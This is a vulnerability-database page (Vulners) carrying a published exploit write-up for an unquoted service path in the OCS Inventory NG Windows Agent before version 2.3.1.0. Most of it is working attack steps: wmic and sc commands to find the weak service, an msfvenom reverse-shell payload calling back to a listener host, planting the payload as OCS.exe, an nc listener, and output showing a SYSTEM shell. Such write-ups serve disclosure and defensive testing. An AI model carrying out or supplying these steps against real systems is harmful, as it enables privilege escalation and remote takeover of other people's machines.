Vulners
Lucene search
OCS Inventory NG 2.3.0.0 - Unquoted Service Path
#####################################################################
# #
# Exploit Title: OCS Inventory NG 2.3.0.0 - Unquoted Service Path #
# Date: 2023/04/21 #
# Exploit Author: msd0pe #
# Vendor Homepage: https://oscinventory-ng.org #
# Software Link: https://github.com/OCSInventory-NG/WindowsAgent #
# My Github: https://github.com/msd0pe-1 #
# Fixed in version 2.3.1.0 #
# #
#####################################################################
OCS Inventory NG Windows Agent:
Versions below 2.3.1.0 contains an unquoted service path which allows attackers to escalate privileges to the system level.
[1] Find the unquoted service path:
> wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
OCS Inventory Service OCS Inventory Service C:\Program Files (x86)\OCS Inventory Agent\OcsService.exe Auto
[2] Get informations about the service:
> sc qc "OCS Inventory Service"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: OCS Inventory Service
TYPE : 110 WIN32_OWN_PROCESS (interactive)
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\OCS Inventory Agent\OcsService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : OCS Inventory Service
DEPENDENCIES : RpcSs
: EventLog
: Winmgmt
: Tcpip
SERVICE_START_NAME : LocalSystem
[3] Generate a reverse shell:
> msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.101 LPORT=4444 -f exe -o OCS.exe
[4] Upload the revese shell to C:\Program Files (x86)\OCS.exe
> put OCS.exe
> ls
drw-rw-rw- 0 Sat Apr 22 05:20:38 2023 .
drw-rw-rw- 0 Sat Apr 22 05:20:38 2023 ..
drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Common Files
-rw-rw-rw- 174 Sun Jul 24 08:12:38 2022 desktop.ini
drw-rw-rw- 0 Thu Jul 28 13:00:04 2022 Internet Explorer
drw-rw-rw- 0 Sun Jul 24 07:27:06 2022 Microsoft
drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Microsoft.NET
drw-rw-rw- 0 Sat Apr 22 04:51:20 2023 OCS Inventory Agent
-rw-rw-rw- 7168 Sat Apr 22 05:20:38 2023 OCS.exe
drw-rw-rw- 0 Sat Apr 22 03:24:58 2023 Windows Defender
drw-rw-rw- 0 Thu Jul 28 13:00:04 2022 Windows Mail
drw-rw-rw- 0 Thu Jul 28 13:00:04 2022 Windows Media Player
drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Windows Multimedia Platform
drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Windows NT
drw-rw-rw- 0 Fri Oct 28 05:25:41 2022 Windows Photo Viewer
drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Windows Portable Devices
drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Windows Sidebar
drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 WindowsPowerShell
[5] Start listener
> nc -lvp 4444
[6] Reboot the service/server
> sc stop "OCS Inventory Service"
> sc start "OCS Inventory Service"
OR
> shutdown /r
[7] Enjoy !
192.168.1.102: inverse host lookup failed: Unknown host
connect to [192.168.1.101] from (UNKNOWN) [192.168.1.102] 51309
Microsoft Windows [Version 10.0.19045.2130]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt authority\systemData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
25 Apr 2023 00:00Current
7.4High risk
Vulners AI Score7.4